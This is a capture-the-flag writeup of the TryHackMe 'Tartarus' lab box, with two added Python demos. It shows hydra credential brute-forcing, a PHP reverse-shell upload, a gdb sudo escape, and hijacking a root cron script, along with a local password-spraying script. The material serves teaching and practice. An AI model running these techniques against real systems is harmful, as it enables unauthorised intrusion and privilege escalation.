WriteUp — THM Tartarus

Jari Laurila
Oct 12, 2020


This is a beginner box based on simple enumeration of services and basic privilege escalation techniques.

This writeup is for TryHackMe room Tartarus.


NMAP

Let’s start, as usual, with nmap:

nmap -sC -sV -p- 10.10.34.22 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 13:48 EEST
Nmap scan report for 10.10.34.22
Host is up (0.053s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.108.247
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
| 256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_ 256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds

WWW

Navigating to the server IP in a browser shows only the Apache default page, so there is nothing to click on; we need to enumerate.

nikto -h 10.10.34.22 

points us to take a look at robots.txt which contains

User-Agent: *
Disallow : /admin-dir

I told d4rckh we should hide our things deep.

d4rckh looks like a username, so it goes into the list for a dictionary attack. The disallowed /admin-dir is also worth a look: robots.txt only keeps well-behaved crawlers away, it does nothing to stop a person who reads it.

/admin-dir contains two files, userid and credentials.txt, holding candidate usernames and passwords (d4rckh among them). Let's feed these to hydra.

SSH

hydra -L userid -P credentials.txt -t 4 10.10.34.22 ssh

That didn't work. Let's try FTP.

FTP

FTP allows anonymous login, so let's take a look at what's inside. There is a single file, test.txt, with nothing special in it. But there is more: ls -la reveals something hidden, a directory named with three dots so that a plain ls skips it:

ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ...
-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt

Browsing into that directory eventually leads to yougotgoodeyes.txt, which contains /sUp3r-s3cr3t. That URL is a login page where we can test the collected usernames and passwords once more, again with hydra. Note the failure condition at the end of the form spec: hydra counts any response that does not contain "Incorrect username!" as a hit, so this run only proves which username the form accepts; if the application answers a wrong password with a different message, check that message before trusting the password half of the result.

hydra -L userid -P credentials.txt 10.10.34.22 http-post-form '/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect username!'
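To make the failure-string behaviour concrete, here is an added example (not part of the original writeup, and not the box's real application) that runs a constructed stand-in for authenticate.php on localhost and a small sprayer that mimics hydra's http-post-form rule: a response without the failure marker is a hit. The wordlists, the "Incorrect password!" message and the valid credentials are assumptions made up for the demo; the page only tells us that a bad username yields "Incorrect username!".

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode
from urllib.request import urlopen

# Constructed values for the demo. The box's real password and its
# wrong-password message are NOT on the page; these are assumptions.
VALID_USER = "d4rckh"
VALID_PASS = "demo-pass"
USERIDS = ["admin", "d4rckh", "thirtytwo"]           # constructed userid list
PASSWORDS = ["password", "letmein", "demo-pass"]     # constructed credentials.txt


class FakeAuth(BaseHTTPRequestHandler):
    """Stand-in for /sUp3r-s3cr3t/authenticate.php with per-field error messages."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if user != VALID_USER:
            body = "Incorrect username!"      # the message the writeup keys on
        elif password != VALID_PASS:
            body = "Incorrect password!"      # assumed message for a bad password
        else:
            body = "Welcome, you may upload files"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):             # keep the demo quiet
        pass


def start_server():
    """Serve FakeAuth on a random localhost port; returns (server, login_url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeAuth)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d/sUp3r-s3cr3t/authenticate.php" % srv.server_address[1]
    return srv, url


def attempt(url, user, password):
    """One POST with username=...&password=..., returning the response body."""
    data = urlencode({"username": user, "password": password}).encode()
    with urlopen(url, data=data, timeout=5) as resp:
        return resp.read().decode()


def spray(url, users, passwords, fail_marker):
    """hydra's rule: a body that does NOT contain fail_marker is a hit.
    Moves on to the next user after its first hit."""
    hits = []
    for user in users:
        for password in passwords:
            if fail_marker not in attempt(url, user, password):
                hits.append((user, password))
                break
    return hits


def two_stage(url, users, passwords):
    """Stage 1 with the username marker only discovers valid usernames (the
    first password tried looks like a hit). Stage 2 re-runs those users with
    the password marker to find the real password."""
    stage1 = spray(url, users, passwords, "Incorrect username!")
    valid_users = [user for user, _ in stage1]
    stage2 = spray(url, valid_users, passwords, "Incorrect password!")
    return valid_users, stage2


if __name__ == "__main__":
    srv, url = start_server()
    print("stage 1 (username marker):", spray(url, USERIDS, PASSWORDS, "Incorrect username!"))
    print("two-stage result:", two_stage(url, USERIDS, PASSWORDS))
    srv.shutdown()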

Once we get in, we can upload files with no apparent restriction on type, so a PHP reverse shell is the obvious candidate. I take the one from https://github.com/pentestmonkey/php-reverse-shell and set its $ip and $port variables to my attacking host.

But where does the uploaded file go? No luck in the directories found so far, so it's time for gobuster (the mode keyword comes first in gobuster 3):

gobuster dir -u http://10.10.34.22/sUp3r-s3cr3t -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

It reveals an /images directory, and the upload lands in http://10.10.34.22/sUp3r-s3cr3t/images/uploads/

Start a listener on the port configured in the shell, request the uploaded file in the browser, and the shell comes back as www-data. BOOM!

cat /home/d4rckh/user.txt
__REDACTED__

Privesc

Python is available, so upgrade to a proper terminal with:

python -c 'import pty; pty.spawn("/bin/bash")'

Check sudo -l, always a potential source of escalation:

sudo -l
Matching Defaults entries for www-data on ubuntu-xenial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-xenial:
(thirtytwo) NOPASSWD: /var/www/gdb

Get LinEnum (https://github.com/rebootuser/LinEnum), run it on the box and look for a possible exploit. It flags the same binary as SUID; the trailing + in the mode means an ACL grants extra access on top of the classic bits:

[+] Possibly interesting SUID files:
---sr-x--x+ 1 thirtytwo thirtytwo 6546408 Jul 5 21:45 /var/www/gdb

Look up gdb on GTFOBins and use the sudo entry to become thirtytwo:

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit

But that user brings nothing new. Just another rabbit hole.

Let's look at more options by enumerating home directories. There is an interesting file in d4rckh's home folder, owned by root yet world-writable:

www-data@ubuntu-xenial:/home/d4rckh$ ls -la
ls -la
total 16
drwxr-xr-x 2 d4rckh d4rckh 4096 Jul 5 21:35 .
drwxr-xr-x 5 root root 4096 Jul 5 21:45 ..
-rwxrwxrwx 1 root root 129 Jul 5 21:45 cleanup.py
-rw-r--r-- 1 d4rckh d4rckh 33 Jul 5 21:45 user.txt

Looking at the LinEnum report we can see that it is run by a root cron job every two minutes:

*/2 * * * * root python /home/d4rckh/cleanup.py

The file is world-writable and executed as root, so whatever we put in it runs as root: dump directories to /tmp, drop a reverse shell, add a user, and so on. Let's just copy the root flag somewhere we can read it:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys

# Runs as root from the */2 cron entry, so sudo is redundant here (root
# sudoes without a password); the redirect to /tmp makes the flag readable
# from the www-data shell.
try:
    os.system('sudo cat /root/root.txt > /tmp/root.txt')
except:
    sys.exit()

Wait for the next run (at most two minutes) and pick up the flag:

cat /tmp/root.txt
__REDACTED__
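The cron finding above is a pattern worth checking for on any box, so here is an added example (not part of the original writeup) that does the check programmatically: parse a system crontab, keep the jobs that run as root, and report any absolute path in the command that is world-writable or sits in a world-writable, non-sticky directory (where the file could simply be replaced). The crontab text and the files it points at are constructed in a temporary directory to mirror the Tartarus misconfiguration; backup.sh and the @daily job are made up for contrast.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab excerpt modelled on the finding; {home} is filled
# in with a temp directory so the demo runs offline.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root python {home}/cleanup.py
0 3 * * * root {home}/backup.sh
@daily root /bin/true
"""


def parse_system_crontab(text):
    """Return (user, argv) for each job line of a *system* crontab.
    /etc/crontab and /etc/cron.d/* carry a user field after the schedule;
    per-user crontabs (crontab -l) do not and would need a different parser."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if "=" in fields[0]:                 # SHELL=..., PATH=..., MAILTO=...
            continue
        if fields[0].startswith("@"):        # @daily, @reboot, ...
            user, argv = fields[1], fields[2:]
        else:                                # five time fields then the user
            user, argv = fields[5], fields[6:]
        jobs.append((user, argv))
    return jobs


def world_writable(path):
    """True if 'other' has write permission on path."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return False


def dir_allows_replace(path):
    """A world-writable directory without the sticky bit lets anyone unlink
    and recreate files in it, even files they cannot write directly."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX)


def find_hijackable(jobs):
    """Paths in root cron commands that an unprivileged user can change."""
    findings = []
    for user, argv in jobs:
        if user != "root":
            continue
        for arg in argv:
            if not arg.startswith("/"):      # interpreter names, flags, etc.
                continue
            if world_writable(arg) or dir_allows_replace(os.path.dirname(arg)):
                findings.append(arg)
    return findings


def demo():
    """Build the constructed layout and return (findings, cleanup_path, backup_path)."""
    home = tempfile.mkdtemp()
    cleanup = os.path.join(home, "cleanup.py")
    backup = os.path.join(home, "backup.sh")
    with open(cleanup, "w") as f:
        f.write("import os\n")
    with open(backup, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(home, 0o755)
    os.chmod(cleanup, 0o777)                 # the misconfiguration: -rwxrwxrwx root root
    os.chmod(backup, 0o755)                  # sane permissions for comparison
    jobs = parse_system_crontab(SAMPLE_CRONTAB.format(home=home))
    return find_hijackable(jobs), cleanup, backup


if __name__ == "__main__":
    found, _, _ = demo()
    for path in found:
        print("root cron job runs a file you can modify:", path)
```

Only cleanup.py is reported; backup.sh has the same root cron treatment but sane permissions. On the defending side the fix is the obvious one: root-owned, non-writable scripts for anything root's cron executes, and no root jobs pointing into user home directories at all.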

That’s all folks!

Written by Jari Laurila

CTO by day, learning cybersecurity by night.
